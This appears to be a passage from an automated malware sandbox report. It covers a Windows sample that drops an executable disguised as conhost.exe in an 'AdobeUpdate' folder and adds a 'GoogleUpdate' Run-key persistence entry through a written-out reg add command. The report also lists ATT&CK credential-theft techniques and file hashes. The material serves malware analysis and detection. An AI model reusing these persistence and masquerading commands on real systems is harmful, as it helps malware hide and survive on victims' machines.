- Suspicious use of AdjustPrivilegeToken
PID:868
-
-
C:\Windows\system32\find.exefind ":"4⤵PID:2404
-
-
C:\Windows\system32\timeout.exeTimeout /T 1 /Nobreak4⤵
- Delays execution with timeout.exe
PID:2528
-
-
C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4072 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f5⤵PID:2180
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GoogleUpdate /t REG_SZ /d C:\Users\Admin\AppData\Roaming\AdobeUpdate\conhost.exe /f6⤵
- Adds Run key to start application
- Modifies registry key
PID:5140
-
-
-
-
-
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:3224
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
152B
MD5fab8d8d865e33fe195732aa7dcb91c30
SHA12637e832f38acc70af3e511f5eba80fbd7461f2c
SHA2561b034ffe38e534e2b7a21be7c1f207ff84a1d5f3893207d0b4bb1a509b4185ea
SHA51239a3d43ef7e28fea2cb247a5d09576a4904a43680db8c32139f22a03d80f6ede98708a2452f3f82232b868501340f79c0b3f810f597bcaf5267c3ccfb1704b43
-
Filesize
152B
MD536988ca14952e1848e81a959880ea217
SHA1a0482ef725657760502c2d1a5abe0bb37aebaadb
SHA256d7e96088b37cec1bde202ae8ec2d2f3c3aafc368b6ebd91b3e2985846facf2e6
SHA512d04b2f5afec92eb3d9f9cdc148a3eddd1b615e0dfb270566a7969576f50881d1f8572bccb8b9fd7993724bdfe36fc7633a33381d43e0b96c4e9bbd53fc010173
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize1KB
MD576ebc9748b50d4a62b30b3618bc87c63
SHA10fc6acff0432f57c6731bcff95a1bb83681d85cb
SHA2564a339942bd3664d2acb154b55b1632b46122376c71a8ee09c9e6a3794db4cc4d
SHA51244ab2729b2d351f428001c86b9eb8eb8db273ea092c111a8a304a9ff577dc99787d40db6c34eb1d816efa946752ca5d422a55ffb002a12eea934799af24c1389
-
Filesize
124KB
MD5c6fb6db2e5103610c425cfcd8a50e74b
SHA118081c2415801c320c120e037f8f83ec34701bd9
SHA256b24580a3c1166deb01c2e92e4d9503cc1531cc979337aa717c640a882b2f3cc0
SHA512becb594b1b0ea7e920d79e5f8a9b3cf3aec18470644ef47dedf358ba1149a9352543a26b786649453a82e349131884a4a6d9bf1d44cb060142ca3cc529205f41
-
Filesize
573B
MD52e6e73e80e60a9a61925cba10636e275
SHA1eca781f9e0637616ba50e634ebef795e6d63c054
SHA256a361999a859cb53b7a91663ac16c05ee90f570d8b8bef391aee55471226d5401
SHA51244c7e45cbf391a13ae2ac1b2c5360d1097eb8d2d7218d6027e48f5b6b6ab6b68da46fe278bb3ff29fd3696f308450fe706e3335ddbbc61f16fc79a66b7d9dfc1
-
Filesize
6KB
MD59538b8699059398b1205db4ed811feb9
SHA1db770fc63a43bca0481c783f09629b7ba53589f1
SHA256e8e4a16cee1912bd8e5008e1b5af540d5471291727347b8342b20345d8ccac0d
SHA5125b4ece6820f34c37217de56e1d844917e136e9cf7227bcfd8002f37938fccdaa7491bd00daaee4646258f392829a12ebb3809a08c688a8ea03bc55fc1a00472b
-
Filesize
6KB
MD5038f1ec95049c269763082193c35556f
SHA14ea98d6ad2cdeee3433d2f2b409cf42ef4709028
SHA256c22aef238b4cd467b2ce821a2fe42997da9d6feadfb445fd04b95cddf631ad98
SHA5124f7574fdae9f2cc39812fa2227231b96f9f10cc897c01a8495e4159a4815822002850b393cc0ab94e872f03e43284ea477fb8e6c53d07c0daf23e5ab24713732
-
Filesize
5KB
MD5efee099358a930264d778f5a8e882306
SHA16613105fcf28eb1d171b6b57d2ac6ef28b841a41
SHA256d9486ee3fcfa4059a37c76d5cbd3d4216807aad396954a828504462b263ce82e
SHA512e4a9c4e84001a304c4c210d6eb9a880f9cd1385f672a381a7be46e1405cf449abf9f52f90cc574800019cd8093f5dde441801df28dfb6d37c2983f47628a9240
-
Filesize
1KB
MD597684a721a22fe8f9de83a67fc4d9cfc
SHA1e1aeed0f72d30127aba960da49aca4284bb8b2f5
SHA256772285ab4eb337222300a80285ef1775ec699593954594a8cb2fbece562e8aee
SHA512c90ec253f4138027849dc9c67a80b1f809f07d0d83d378cf1c2f8abdac87219fe5d8b7fa778e78d7a77b9187f2ed4a8969c83be2d329d6564074cf78038df2fa
-
Filesize
1KB
MD527dfef6a04f3e9d7af42ce6902217e4c
SHA1937ca7b33420acbbf051f415d0a6f2284cd19bd0
SHA2564dad0534ca781204fe73130df876fe011a496408db13525a321b42640131f19c
SHA5124cc99871a43f2c0686fdd4bc569b1b0ee5f75cfd20afed6e384300c92358069d10931bcd1c93f145ec38efdf97b9758b77b1913b237f3ef64c10ac5a8ba22c8b
-
Filesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
Filesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
Filesize
10KB
MD5fd45cbda30267fcd5186673518a393a8
SHA1742a8d34dd10e050ecd929ba0ea257f8a0d5ac23
SHA256e66f4c2d3851bf9b17276393a9b44677df75a9e857690af8e3bfd1cd2e558c14
SHA5121b4ff202ed068f9670f3cc03157b4c95538728953c2665f87485f1410ae7fc96ba3c38acc66dca8494d59b14c1f5b3bcee28fbd5ff283cf1e64ca5c13fe56a86
-
Filesize
10KB
MD5a251f7d19aaf4885c3f24c677d42671e
SHA1bdbf6abf18875fff13e93cc364cd1298456c1adf
SHA2561953097c25ff5903a6cbbac9d1d0251f8624f65feca19c2dab8c17b6f89364c9
SHA512be16164e93ad693c26fdf43112fc0fcfa7b43fd23d1faea075b8639f40ee3d94c187926896cc17ccbb293c474fad1dff70b151fc88c16cd38fe05269590ae512
-
Filesize
10KB
MD5c0b2c30ce685ee05065902fef827afdc
SHA1675bd398f23c0298c207b7286f1c49024c782b64
SHA25654fdd58a7ad02944ff2dcd7785a0f8a0a7260f7d9c4b9f96d857e086e74a3b31
SHA5124085f815394cda2947c36f4fd1de56ba1786a3a963a937ad5334a01a1494ae7f3afaafbda289cd3dfd1f54f3cc4cb9536f7683704f6260e08a48c8502467dd6d
-
Filesize
5.6MB
MD5eb01eece5f0887b24a1bd53183d801dc
SHA149e92aee8351e3a995d8ec95bc64d7f381dcee28
SHA256a2b1012a39662b760415ee897388c862457f4f1672897db8dee67e125bf0ad5c
SHA51283374fdc381d52b64682df5b96f02cb3d487ce12d9231ede8ee9a92ecf72fa4a0d6f91a04e5f6656cccd50f142dd44bbb08e7ecc94b647e0349064dc32a76839
-
Filesize
1.7MB
MD565ccd6ecb99899083d43f7c24eb8f869
SHA127037a9470cc5ed177c0b6688495f3a51996a023
SHA256aba67c7e6c01856838b8bc6b0ba95e864e1fdcb3750aa7cdc1bc73511cea6fe4
SHA512533900861fe36cf78b614d6a7ce741ff1172b41cbd5644b4a9542e6ca42702e6fbfb12f0fbaae8f5992320870a15e90b4f7bf180705fc9839db433413860be6d
-
Filesize
295B
MD5dc1183ba6ab974968e5a4b9b2fdf8ddb
SHA1011c3f5f4159abcb63677658ee1327d7051e766e
SHA256ac4ae21e1df99b2eaa3f19ef27d521b40768c617f1376b92b331d729740b3c2c
SHA512acec74ff41c904136a1d0e5b101cc5a2bd691c72a48038526c39c6c329a7436fd9f9628c8b44a9a05330f468a8864e497dc250cd0ed1e12e960c3259c0ae2e28